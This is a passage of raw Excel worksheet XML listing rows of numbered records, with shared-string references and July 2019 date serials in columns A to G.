      </c>
      <c r="B11443">
        <v>1442</v>
      </c>
      <c r="C11443" t="s">
        <v>19637</v>
      </c>
      <c r="D11443" s="1">
        <v>43668</v>
      </c>
      <c r="F11443" t="s">
        <v>10526</v>
      </c>
      <c r="G11443" t="s">
        <v>21452</v>
      </c>
    </row>
    <row r="11444" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11444">
        <f t="shared" si="178"/>
        <v>11443</v>
      </c>
      <c r="B11444">
        <v>1443</v>
      </c>
      <c r="C11444" t="s">
        <v>19637</v>
      </c>
      <c r="D11444" s="1">
        <v>43668</v>
      </c>
      <c r="E11444" t="s">
        <v>19725</v>
      </c>
      <c r="F11444" t="s">
        <v>9978</v>
      </c>
      <c r="G11444" t="s">
        <v>21453</v>
      </c>
    </row>
    <row r="11445" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11445">
        <f t="shared" si="178"/>
        <v>11444</v>
      </c>
      <c r="B11445">
        <v>1444</v>
      </c>
      <c r="C11445" t="s">
        <v>19637</v>
      </c>
      <c r="D11445" s="1">
        <v>43676</v>
      </c>
      <c r="E11445" t="s">
        <v>20250</v>
      </c>
      <c r="F11445" t="s">
        <v>10021</v>
      </c>
      <c r="G11445" t="s">
        <v>21454</v>
      </c>
    </row>
    <row r="11446" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11446">
        <f t="shared" si="178"/>
        <v>11445</v>
      </c>
      <c r="B11446">
        <v>1445</v>
      </c>
      <c r="C11446" t="s">
        <v>19637</v>
      </c>
      <c r="D11446" s="1">
        <v>43670</v>
      </c>
      <c r="E11446" t="s">
        <v>20488</v>
      </c>
      <c r="F11446" t="s">
        <v>10526</v>
      </c>
      <c r="G11446" t="s">
        <v>21455</v>
      </c>
    </row>
    <row r="11447" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11447">
        <f t="shared" si="178"/>
        <v>11446</v>
      </c>
      <c r="B11447">
        <v>1446</v>
      </c>
      <c r="C11447" t="s">
        <v>19637</v>
      </c>
      <c r="D11447" s="1">
        <v>43673</v>
      </c>
      <c r="E11447" t="s">
        <v>19640</v>
      </c>
      <c r="F11447" t="s">
        <v>10021</v>
      </c>
      <c r="G11447" t="s">
        <v>21456</v>
      </c>
    </row>
    <row r="11448" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11448">
        <f t="shared" si="178"/>
        <v>11447</v>
      </c>
      <c r="B11448">
        <v>1447</v>
      </c>
      <c r="C11448" t="s">
        <v>19637</v>
      </c>
      <c r="D11448" s="1">
        <v>43669</v>
      </c>
      <c r="E11448" t="s">
        <v>21457</v>
      </c>
      <c r="F11448" t="s">
        <v>10526</v>
      </c>
      <c r="G11448" t="s">
        <v>21458</v>
      </c>
    </row>
    <row r="11449" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11449">
        <f t="shared" si="178"/>
        <v>11448</v>
      </c>
      <c r="B11449">
        <v>1448</v>
      </c>
      <c r="C11449" t="s">
        <v>19637</v>
      </c>
      <c r="D11449" s="1">
        <v>43672</v>
      </c>
      <c r="E11449" t="s">
        <v>19952</v>
      </c>
      <c r="F11449" t="s">
        <v>9978</v>
      </c>
      <c r="G11449" t="s">
        <v>21459</v>
      </c>
    </row>
    <row r="11450" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11450">
        <f t="shared" si="178"/>
        <v>11449</v>
      </c>
      <c r="B11450">
        <v>1449</v>
      </c>
      <c r="C11450" t="s">
        <v>19637</v>
      </c>
      <c r="D11450" s="1">
        <v>43670</v>
      </c>
      <c r="E11450" t="s">
        <v>21460</v>
      </c>
      <c r="F11450" t="s">
        <v>10526</v>
      </c>
      <c r="G11450" t="s">
        <v>21461</v>
      </c>
    </row>
    <row r="11451" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11451">
        <f t="shared" si="178"/>
        <v>11450</v>
      </c>
      <c r="B11451">
        <v>1450</v>
      </c>
      <c r="C11451" t="s">
        <v>19637</v>
      </c>
      <c r="D11451" s="1">
        <v>43675</v>
      </c>
      <c r="E11451" t="s">
        <v>21462</v>
      </c>
      <c r="F11451" t="s">
        <v>9978</v>
      </c>
      <c r="G11451" t="s">
        <v>21463</v>
      </c>
    </row>
    <row r="11452" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11452">
        <f t="shared" si="178"/>
        <v>11451</v>
      </c>
      <c r="B11452">
        <v>1451</v>
      </c>
      <c r="C11452" t="s">
        <v>19637</v>
      </c>
      <c r="D11452" s="1">
        <v>43673</v>
      </c>
      <c r="F11452" t="s">
        <v>10526</v>
      </c>
      <c r="G11452" t="s">
        <v>21464</v>
      </c>
    </row>
    <row r="11453" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11453">
        <f t="shared" si="178"/>
        <v>11452</v>
      </c>
      <c r="B11453">
        <v>1452</v>
      </c>
      <c r="C11453" t="s">
        <v>19637</v>
      </c>
      <c r="D11453" s="1">
        <v>43671</v>
      </c>
      <c r="F11453" t="s">
        <v>10526</v>
      </c>
      <c r="G11453" t="s">
        <v>21465</v>
      </c>
    </row>
    <row r="11454" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11454">
        <f t="shared" si="178"/>
        <v>11453</v>
      </c>
      <c r="B11454">
        <v>1453</v>
      </c>
      <c r="C11454" t="s">
        <v>19637</v>
      </c>
      <c r="D11454" s="1">
        <v>43675</v>
      </c>
      <c r="E11454" t="s">
        <v>21466</v>
      </c>
      <c r="F11454" t="s">
        <v>9978</v>
      </c>
      <c r="G11454" t="s">
        <v>21467</v>
      </c>
    </row>
    <row r="11455" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11455">
        <f t="shared" si="178"/>
        <v>11454</v>
      </c>
      <c r="B11455">
        <v>1454</v>
      </c>
      <c r="C11455" t="s">
        <v>19637</v>
      </c>
      <c r="D11455" s="1">
        <v>43674</v>
      </c>
      <c r="E11455" t="s">
        <v>19917</v>
      </c>
      <c r="F11455" t="s">
        <v>9975</v>
      </c>
      <c r="G11455" t="s">
        <v>21468</v>
      </c>
    </row>
    <row r="11456" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11456">
        <f t="shared" si="178"/>
        <v>11455</v>
      </c>
      <c r="B11456">
        <v>1455</v>
      </c>
      <c r="C11456" t="s">
        <v>19637</v>
      </c>
      <c r="D11456" s="1">
        <v>43668</v>
      </c>
      <c r="E11456" t="s">
        <v>19640</v>
      </c>
      <c r="F11456" t="s">
        <v>9975</v>
      </c>
      <c r="G11456" t="s">
        <v>21469</v>
      </c>
    </row>
    <row r="11457" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11457">
        <f t="shared" si="178"/>
        <v>11456</v>
      </c>
      <c r="B11457">
        <v>1456</v>
      </c>
      <c r="C11457" t="s">
        <v>19637</v>
      </c>
      <c r="D11457" s="1">
        <v>43671</v>
      </c>
      <c r="E11457" t="s">
        <v>19640</v>
      </c>
      <c r="F11457" t="s">
        <v>10021</v>
      </c>
      <c r="G11457" t="s">
        <v>21470</v>
      </c>
    </row>
    <row r="11458" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11458">
        <f t="shared" si="178"/>
        <v>11457</v>
      </c>
      <c r="B11458">
        <v>1457</v>
      </c>
      <c r="C11458" t="s">
        <v>19637</v>
      </c>
      <c r="D11458" s="1">
        <v>43672</v>
      </c>
      <c r="F11458" t="s">
        <v>10021</v>
      </c>
      <c r="G11458" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="11459" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11459">
        <f t="shared" ref="A11459:A11522" si="179">+ROW(A11458)</f>
        <v>11458</v>
      </c>
      <c r="B11459">
        <v>1458</v>
      </c>
      <c r="C11459" t="s">
        <v>19637</v>
      </c>
      <c r="D11459" s="1">
        <v>43671</v>
      </c>
      <c r="E11459" t="s">
        <v>19640</v>
      </c>
      <c r="F11459" t="s">
        <v>10021</v>
      </c>
      <c r="G11459" t="s">
        <v>21471</v>
      </c>
    </row>
    <row r="11460" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11460">
        <f t="shared" si="179"/>
        <v>11459</v>
      </c>
      <c r="B11460">
        <v>1459</v>
      </c>
      <c r="C11460" t="s">
        <v>19637</v>
      </c>
      <c r="D11460" s="1">
        <v>43668</v>
      </c>
      <c r="E11460" t="s">
        <v>20995</v>
      </c>
      <c r="F11460" t="s">
        <v>9975</v>
      </c>
      <c r="G11460" t="s">
        <v>21472</v>
      </c>
    </row>
    <row r="11461" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11461">
        <f t="shared" si="179"/>
        <v>11460</v>
      </c>
      <c r="B11461">
        <v>1460</v>
      </c>
      <c r="C11461" t="s">
        <v>19637</v>
      </c>
      <c r="D11461" s="1">
        <v>43677</v>
      </c>
      <c r="E11461" t="s">
        <v>19917</v>
      </c>
      <c r="F11461" t="s">
        <v>9975</v>
      </c>
      <c r="G11461" t="s">
        <v>21473</v>
      </c>
    </row>
    <row r="11462" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11462">
        <f t="shared" si="179"/>
        <v>11461</v>
      </c>
      <c r="B11462">
        <v>1461</v>
      </c>
      <c r="C11462" t="s">
        <v>19637</v>
      </c>
      <c r="D11462" s="1">
        <v>43672</v>
      </c>
      <c r="E11462" t="s">
        <v>20250</v>
      </c>
      <c r="F11462" t="s">
        <v>10021</v>
      </c>
      <c r="G11462" t="s">
        <v>21474</v>
      </c>
    </row>
    <row r="11463" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11463">
        <f t="shared" si="179"/>
        <v>11462</v>
      </c>
      <c r="B11463">
        <v>1462</v>
      </c>
      <c r="C11463" t="s">
        <v>19637</v>
      </c>
      <c r="D11463" s="1">
        <v>43675</v>
      </c>
      <c r="E11463" t="s">
        <v>21475</v>
      </c>
      <c r="F11463" t="s">
        <v>10526</v>
      </c>
      <c r="G11463" t="s">
        <v>21476</v>
      </c>
    </row>
    <row r="11464" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11464">
        <f t="shared" si="179"/>
        <v>11463</v>
      </c>
      <c r="B11464">
        <v>1463</v>
      </c>
      <c r="C11464" t="s">
        <v>19637</v>
      </c>
      <c r="D11464" s="1">
        <v>43674</v>
      </c>
      <c r="E11464" t="s">
        <v>19917</v>
      </c>
      <c r="F11464" t="s">
        <v>9975</v>
      </c>
      <c r="G11464" t="s">
        <v>21477</v>
      </c>
    </row>
    <row r="11465" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11465">
        <f t="shared" si="179"/>
        <v>11464</v>
      </c>
      <c r="B11465">
        <v>1464</v>
      </c>
      <c r="C11465" t="s">
        <v>19637</v>
      </c>
      <c r="D11465" s="1">
        <v>43668</v>
      </c>
      <c r="E11465" t="s">
        <v>20789</v>
      </c>
      <c r="F11465" t="s">
        <v>10526</v>
      </c>
      <c r="G11465" t="s">
        <v>21478</v>
      </c>
    </row>
    <row r="11466" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11466">
        <f t="shared" si="179"/>
        <v>11465</v>
      </c>
      <c r="B11466">
        <v>1465</v>
      </c>
      <c r="C11466" t="s">
        <v>19637</v>
      </c>
      <c r="D11466" s="1">
        <v>43672</v>
      </c>
      <c r="E11466" t="s">
        <v>20187</v>
      </c>
      <c r="F11466" t="s">
        <v>9975</v>
      </c>
      <c r="G11466" t="s">
        <v>21479</v>
      </c>
    </row>
    <row r="11467" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11467">
        <f t="shared" si="179"/>
        <v>11466</v>
      </c>
      <c r="B11467">
        <v>1466</v>
      </c>
      <c r="C11467" t="s">
        <v>19637</v>
      </c>
      <c r="D11467" s="1">
        <v>43671</v>
      </c>
      <c r="E11467" t="s">
        <v>19690</v>
      </c>
      <c r="F11467" t="s">
        <v>9978</v>
      </c>
      <c r="G11467" t="s">
        <v>21480</v>
      </c>
    </row>
    <row r="11468" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11468">
        <f t="shared" si="179"/>
        <v>11467</v>
      </c>
      <c r="B11468">
        <v>1467</v>
      </c>
      <c r="C11468" t="s">
        <v>19637</v>
      </c>
      <c r="D11468" s="1">
        <v>43672</v>
      </c>
      <c r="E11468" t="s">
        <v>19879</v>
      </c>
      <c r="F11468" t="s">
        <v>10021</v>
      </c>
      <c r="G11468" t="s">
        <v>21481</v>
      </c>
    </row>
    <row r="11469" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11469">
        <f t="shared" si="179"/>
        <v>11468</v>
      </c>
      <c r="B11469">
        <v>1468</v>
      </c>
      <c r="C11469" t="s">
        <v>19637</v>
      </c>
      <c r="D11469" s="1">
        <v>43668</v>
      </c>
      <c r="E11469" t="s">
        <v>20958</v>
      </c>
      <c r="F11469" t="s">
        <v>9978</v>
      </c>
      <c r="G11469" t="s">
        <v>21482</v>
      </c>
    </row>
    <row r="11470" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11470">
        <f t="shared" si="179"/>
        <v>11469</v>
      </c>
      <c r="B11470">
        <v>1469</v>
      </c>
      <c r="C11470" t="s">
        <v>19637</v>
      </c>
      <c r="D11470" s="1">
        <v>43668</v>
      </c>
      <c r="F11470" t="s">
        <v>10526</v>
      </c>
      <c r="G11470" t="s">
        <v>21483</v>
      </c>
    </row>
    <row r="11471" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11471">
        <f t="shared" si="179"/>
        <v>11470</v>
      </c>
      <c r="B11471">
        <v>1470</v>
      </c>
      <c r="C11471" t="s">
        <v>19637</v>
      </c>
      <c r="D11471" s="1">
        <v>43670</v>
      </c>
      <c r="E11471" t="s">
        <v>19640</v>
      </c>
      <c r="F11471" t="s">
        <v>9975</v>
      </c>
      <c r="G11471" t="s">
        <v>21484</v>
      </c>
    </row>
    <row r="11472" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11472">
        <f t="shared" si="179"/>
        <v>11471</v>
      </c>
      <c r="B11472">
        <v>1471</v>
      </c>
      <c r="C11472" t="s">
        <v>19637</v>
      </c>
      <c r="D11472" s="1">
        <v>43671</v>
      </c>
      <c r="E11472" t="s">
        <v>21485</v>
      </c>
      <c r="F11472" t="s">
        <v>10526</v>
      </c>
      <c r="G11472" t="s">
        <v>21486</v>
      </c>
    </row>
    <row r="11473" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11473">
        <f t="shared" si="179"/>
        <v>11472</v>
      </c>
      <c r="B11473">
        <v>1472</v>
      </c>
      <c r="C11473" t="s">
        <v>19637</v>
      </c>
      <c r="D11473" s="1">
        <v>43675</v>
      </c>
      <c r="E11473" t="s">
        <v>19982</v>
      </c>
      <c r="F11473" t="s">
        <v>9978</v>
      </c>
      <c r="G11473" t="s">
        <v>21487</v>
      </c>
    </row>
    <row r="11474" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11474">
        <f t="shared" si="179"/>
        <v>11473</v>
      </c>
      <c r="B11474">
        <v>1473</v>
      </c>
      <c r="C11474" t="s">
        <v>19637</v>
      </c>
      <c r="D11474" s="1">
        <v>43673</v>
      </c>
      <c r="E11474" t="s">
        <v>21488</v>
      </c>
      <c r="F11474" t="s">
        <v>9975</v>
      </c>
      <c r="G11474" t="s">
        <v>21489</v>
      </c>
    </row>
    <row r="11475" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11475">
        <f t="shared" si="179"/>
        <v>11474</v>
      </c>
      <c r="B11475">
        <v>1474</v>
      </c>
      <c r="C11475" t="s">
        <v>19637</v>
      </c>
      <c r="D11475" s="1">
        <v>43673</v>
      </c>
      <c r="F11475" t="s">
        <v>10526</v>
      </c>
      <c r="G11475" t="s">
        <v>21490</v>
      </c>
    </row>
    <row r="11476" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11476">
        <f t="shared" si="179"/>
        <v>11475</v>
      </c>
      <c r="B11476">
        <v>1475</v>
      </c>
      <c r="C11476" t="s">
        <v>19637</v>
      </c>
      <c r="D11476" s="1">
        <v>43675</v>
      </c>
      <c r="E11476" t="s">
        <v>21491</v>
      </c>
      <c r="F11476" t="s">
        <v>10526</v>
      </c>
      <c r="G11476" t="s">
        <v>21492</v>
      </c>
    </row>
    <row r="11477" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11477">
        <f t="shared" si="179"/>
        <v>11476</v>
      </c>
      <c r="B11477">
        <v>1476</v>
      </c>
      <c r="C11477" t="s">
        <v>19637</v>
      </c>
      <c r="D11477" s="1">
        <v>43674</v>
      </c>
      <c r="E11477" t="s">
        <v>19982</v>
      </c>
      <c r="F11477" t="s">
        <v>9978</v>
      </c>
      <c r="G11477" t="s">
        <v>21493</v>
      </c>
    </row>
    <row r="11478" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11478">
        <f t="shared" si="179"/>
        <v>11477</v>
      </c>
      <c r="B11478">
        <v>1477</v>
      </c>
      <c r="C11478" t="s">
        <v>19637</v>
      </c>
      <c r="D11478" s="1">
        <v>43673</v>
      </c>
      <c r="E11478" t="s">
        <v>21494</v>
      </c>
      <c r="F11478" t="s">
        <v>9978</v>
      </c>
      <c r="G11478" t="s">
        <v>21495</v>
      </c>
    </row>
    <row r="11479" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11479">
        <f t="shared" si="179"/>
        <v>11478</v>
      </c>
      <c r="B11479">
        <v>1478</v>
      </c>
      <c r="C11479" t="s">
        <v>19637</v>
      </c>
      <c r="D11479" s="1">
        <v>43669</v>
      </c>
      <c r="E11479" t="s">
        <v>21496</v>
      </c>
      <c r="F11479" t="s">
        <v>10526</v>
      </c>
      <c r="G11479" t="s">
        <v>21497</v>
      </c>
    </row>
    <row r="11480" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11480">
        <f t="shared" si="179"/>
        <v>11479</v>
      </c>
      <c r="B11480">
        <v>1479</v>
      </c>
      <c r="C11480" t="s">
        <v>19637</v>
      </c>
      <c r="D11480" s="1">
        <v>43675</v>
      </c>
      <c r="E11480" t="s">
        <v>19736</v>
      </c>
      <c r="F11480" t="s">
        <v>10526</v>
      </c>
      <c r="G11480" t="s">
        <v>21498</v>
      </c>
    </row>
    <row r="11481" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11481">
        <f t="shared" si="179"/>
        <v>11480</v>
      </c>
      <c r="B11481">
        <v>1480</v>
      </c>
      <c r="C11481" t="s">
        <v>19637</v>
      </c>
      <c r="D11481" s="1">
        <v>43676</v>
      </c>
      <c r="E11481" t="s">
        <v>21499</v>
      </c>
      <c r="F11481" t="s">
        <v>9978</v>
      </c>
      <c r="G11481" t="s">
        <v>21500</v>
      </c>
    </row>
    <row r="11482" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11482">
        <f t="shared" si="179"/>
        <v>11481</v>
      </c>
      <c r="B11482">
        <v>1481</v>
      </c>
      <c r="C11482" t="s">
        <v>19637</v>
      </c>
      <c r="D11482" s="1">
        <v>43673</v>
      </c>
      <c r="E11482" t="s">
        <v>21501</v>
      </c>
      <c r="F11482" t="s">
        <v>10526</v>
      </c>
      <c r="G11482" t="s">
        <v>21502</v>
      </c>
    </row>
    <row r="11483" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11483">
        <f t="shared" si="179"/>
        <v>11482</v>
      </c>
      <c r="B11483">
        <v>1482</v>
      </c>
      <c r="C11483" t="s">
        <v>19637</v>
      </c>
      <c r="D11483" s="1">
        <v>43673</v>
      </c>
      <c r="E11483" t="s">
        <v>19796</v>
      </c>
      <c r="F11483" t="s">
        <v>10021</v>
      </c>
      <c r="G11483" t="s">
        <v>21503</v>
      </c>
    </row>
    <row r="11484" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11484">
        <f t="shared" si="179"/>
        <v>11483</v>
      </c>
      <c r="B11484">
        <v>1483</v>
      </c>
      <c r="C11484" t="s">
        <v>19637</v>
      </c>
      <c r="D11484" s="1">
        <v>43668</v>
      </c>
      <c r="E11484" t="s">
        <v>19776</v>
      </c>
      <c r="F11484" t="s">
        <v>10021</v>
      </c>
      <c r="G11484" t="s">
        <v>21504</v>
      </c>
    </row>
    <row r="11485" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11485">
        <f t="shared" si="179"/>
        <v>11484</v>
      </c>
      <c r="B11485">
        <v>1484</v>
      </c>
      <c r="C11485" t="s">
        <v>19637</v>
      </c>
      <c r="D11485" s="1">
        <v>43669</v>
      </c>
      <c r="E11485" t="s">
        <v>21505</v>
      </c>
      <c r="F11485" t="s">
        <v>10526</v>
      </c>
      <c r="G11485" t="s">
        <v>21506</v>
      </c>
    </row>
    <row r="11486" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11486">
        <f t="shared" si="179"/>
        <v>11485</v>
      </c>
      <c r="B11486">
        <v>1485</v>
      </c>
      <c r="C11486" t="s">
        <v>19637</v>
      </c>
      <c r="D11486" s="1">
        <v>43676</v>
      </c>
      <c r="F11486" t="s">
        <v>10526</v>
      </c>
      <c r="G11486" t="s">
        <v>21507</v>
      </c>
    </row>
    <row r="11487" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11487">
        <f t="shared" si="179"/>
        <v>11486</v>
      </c>
      <c r="B11487">
        <v>1486</v>
      </c>
      <c r="C11487" t="s">
        <v>19637</v>
      </c>
      <c r="D11487" s="1">
        <v>43669</v>
      </c>
      <c r="F11487" t="s">
        <v>10021</v>
      </c>
      <c r="G11487" t="s">
        <v>21508</v>
      </c>
    </row>
    <row r="11488" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11488">
        <f t="shared" si="179"/>
        <v>11487</v>
      </c>
      <c r="B11488">
        <v>1487</v>
      </c>
      <c r="C11488" t="s">
        <v>19637</v>
      </c>
      <c r="D11488" s="1">
        <v>43674</v>
      </c>
      <c r="E11488" t="s">
        <v>19640</v>
      </c>
      <c r="F11488" t="s">
        <v>9975</v>
      </c>
      <c r="G11488" t="s">
        <v>21509</v>
      </c>
    </row>
    <row r="11489" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11489">
        <f t="shared" si="179"/>
        <v>11488</v>
      </c>
      <c r="B11489">
        <v>1488</v>
      </c>
      <c r="C11489" t="s">
        <v>19637</v>
      </c>
      <c r="D11489" s="1">
        <v>43677</v>
      </c>
      <c r="F11489" t="s">
        <v>10526</v>
      </c>
      <c r="G11489" t="s">
        <v>21510</v>
      </c>
    </row>
    <row r="11490" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11490">
        <f t="shared" si="179"/>
        <v>11489</v>
      </c>
      <c r="B11490">
        <v>1489</v>
      </c>
      <c r="C11490" t="s">
        <v>19637</v>
      </c>
      <c r="D11490" s="1">
        <v>43677</v>
      </c>
      <c r="E11490" t="s">
        <v>19741</v>
      </c>
      <c r="F11490" t="s">
        <v>9975</v>
      </c>
      <c r="G11490" t="s">
        <v>21511</v>
      </c>
    </row>
    <row r="11491" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11491">
        <f t="shared" si="179"/>
        <v>11490</v>
      </c>
      <c r="B11491">
        <v>1490</v>
      </c>
      <c r="C11491" t="s">
        <v>19637</v>
      </c>
      <c r="D11491" s="1">
        <v>43677</v>
      </c>
      <c r="E11491" t="s">
        <v>19849</v>
      </c>
      <c r="F11491" t="s">
        <v>10021</v>
      </c>
      <c r="G11491" t="s">
        <v>21512</v>
      </c>
    </row>
    <row r="11492" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11492">
        <f t="shared" si="179"/>
        <v>11491</v>
      </c>
      <c r="B11492">
        <v>1491</v>
      </c>
      <c r="C11492" t="s">
        <v>19637</v>
      </c>
      <c r="D11492" s="1">
        <v>43668</v>
      </c>
      <c r="E11492" t="s">
        <v>20220</v>
      </c>
      <c r="F11492" t="s">
        <v>10021</v>
      </c>
      <c r="G11492" t="s">
        <v>21513</v>
      </c>
    </row>
    <row r="11493" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11493">
        <f t="shared" si="179"/>
        <v>11492</v>
      </c>
      <c r="B11493">
        <v>1492</v>
      </c>
      <c r="C11493" t="s">
        <v>19637</v>
      </c>
      <c r="D11493" s="1">
        <v>43669</v>
      </c>
      <c r="E11493" t="s">
        <v>21514</v>
      </c>
      <c r="F11493" t="s">
        <v>10526</v>
      </c>
      <c r="G11493" t="s">
        <v>21515</v>
      </c>
    </row>
    <row r="11494" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11494">
        <f t="shared" si="179"/>
        <v>11493</v>
      </c>
      <c r="B11494">
        <v>1493</v>
      </c>
      <c r="C11494" t="s">
        <v>19637</v>
      </c>
      <c r="D11494" s="1">
        <v>43674</v>
      </c>
      <c r="E11494" t="s">
        <v>19741</v>
      </c>
      <c r="F11494" t="s">
        <v>9975</v>
      </c>
      <c r="G11494" t="s">
        <v>21516</v>
      </c>
    </row>
    <row r="11495" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11495">
        <f t="shared" si="179"/>
        <v>11494</v>
      </c>
      <c r="B11495">
        <v>1494</v>
      </c>
      <c r="C11495" t="s">
        <v>19637</v>
      </c>
      <c r="D11495" s="1">
        <v>43669</v>
      </c>
      <c r="E11495" t="s">
        <v>21517</v>
      </c>
      <c r="F11495" t="s">
        <v>9978</v>
      </c>
      <c r="G11495" t="s">
        <v>21518</v>
      </c>
    </row>
    <row r="11496" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11496">
        <f t="shared" si="179"/>
        <v>11495</v>
      </c>
      <c r="B11496">
        <v>1495</v>
      </c>
      <c r="C11496" t="s">
        <v>19637</v>
      </c>
      <c r="D11496" s="1">
        <v>43676</v>
      </c>
      <c r="E11496" t="s">
        <v>21519</v>
      </c>
      <c r="F11496" t="s">
        <v>10021</v>
      </c>
      <c r="G11496" t="s">
        <v>21520</v>
      </c>
    </row>
    <row r="11497" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11497">
        <f t="shared" si="179"/>
        <v>11496</v>
      </c>
      <c r="B11497">
        <v>1496</v>
      </c>
      <c r="C11497" t="s">
        <v>19637</v>
      </c>
      <c r="D11497" s="1">
        <v>43668</v>
      </c>
      <c r="F11497" t="s">
        <v>10526</v>
      </c>
      <c r="G11497" t="s">
        <v>21521</v>
      </c>
    </row>
    <row r="11498" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11498">
        <f t="shared" si="179"/>
        <v>11497</v>
      </c>
      <c r="B11498">
        <v>1497</v>
      </c>
      <c r="C11498" t="s">
        <v>19637</v>
      </c>
      <c r="D11498" s="1">
        <v>43670</v>
      </c>
      <c r="F11498" t="s">
        <v>9978</v>
      </c>
      <c r="G11498" t="s">
        <v>21522</v>
      </c>
    </row>
    <row r="11499" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11499">
        <f t="shared" si="179"/>
        <v>11498</v>
      </c>
      <c r="B11499">
        <v>1498</v>
      </c>
      <c r="C11499" t="s">
        <v>19637</v>
      </c>
      <c r="D11499" s="1">
        <v>43670</v>
      </c>
      <c r="F11499" t="s">
        <v>10021</v>
      </c>
      <c r="G11499" t="s">
        <v>21523</v>
      </c>
    </row>
    <row r="11500" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11500">
        <f t="shared" si="179"/>
        <v>11499</v>
      </c>
      <c r="B11500">
        <v>1499</v>
      </c>
      <c r="C11500" t="s">
        <v>19637</v>
      </c>
      <c r="D11500" s="1">
        <v>43677</v>
      </c>
      <c r="E11500" t="s">
        <v>21524</v>
      </c>
      <c r="F11500" t="s">
        <v>10021</v>
      </c>
      <c r="G11500" t="s">
        <v>21525</v>
      </c>
    </row>
    <row r="11501" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11501">
        <f t="shared" si="179"/>
        <v>11500</v>
      </c>
      <c r="B11501">
        <v>1500</v>
      </c>
      <c r="C11501" t="s">
        <v>19637</v>
      </c>
      <c r="D11501" s="1">
        <v>43670</v>
      </c>
      <c r="E11501" t="s">
        <v>19640</v>
      </c>
      <c r="F11501" t="s">
        <v>10526</v>
      </c>
      <c r="G11501" t="s">
        <v>21526</v>
      </c>
    </row>
    <row r="11502" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11502">
        <f t="shared" si="179"/>
        <v>11501</v>
      </c>
      <c r="B11502">
        <v>1501</v>
      </c>
      <c r="C11502" t="s">
        <v>19637</v>
      </c>
      <c r="D11502" s="1">
        <v>43672</v>
      </c>
      <c r="E11502" t="s">
        <v>19640</v>
      </c>
      <c r="F11502" t="s">
        <v>10021</v>
      </c>
      <c r="G11502" t="s">
        <v>21527</v>
      </c>
    </row>
    <row r="11503" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11503">
        <f t="shared" si="179"/>
        <v>11502</v>
      </c>
      <c r="B11503">
        <v>1502</v>
      </c>
      <c r="C11503" t="s">
        <v>19637</v>
      </c>
      <c r="D11503" s="1">
        <v>43677</v>
      </c>
      <c r="E11503" t="s">
        <v>19796</v>
      </c>
      <c r="F11503" t="s">
        <v>10021</v>
      </c>
      <c r="G11503" t="s">
        <v>21528</v>
      </c>
    </row>
    <row r="11504" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11504">
        <f t="shared" si="179"/>
        <v>11503</v>
      </c>
      <c r="B11504">
        <v>1503</v>
      </c>
      <c r="C11504" t="s">
        <v>19637</v>
      </c>
      <c r="D11504" s="1">
        <v>43673</v>
      </c>
      <c r="F11504" t="s">
        <v>10526</v>
      </c>
      <c r="G11504" t="s">
        <v>21529</v>
      </c>
    </row>
    <row r="11505" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11505">
        <f t="shared" si="179"/>
        <v>11504</v>
      </c>
      <c r="B11505">
        <v>1504</v>
      </c>
      <c r="C11505" t="s">
        <v>19637</v>
      </c>
      <c r="D11505" s="1">
        <v>43673</v>
      </c>
      <c r="E11505" t="s">
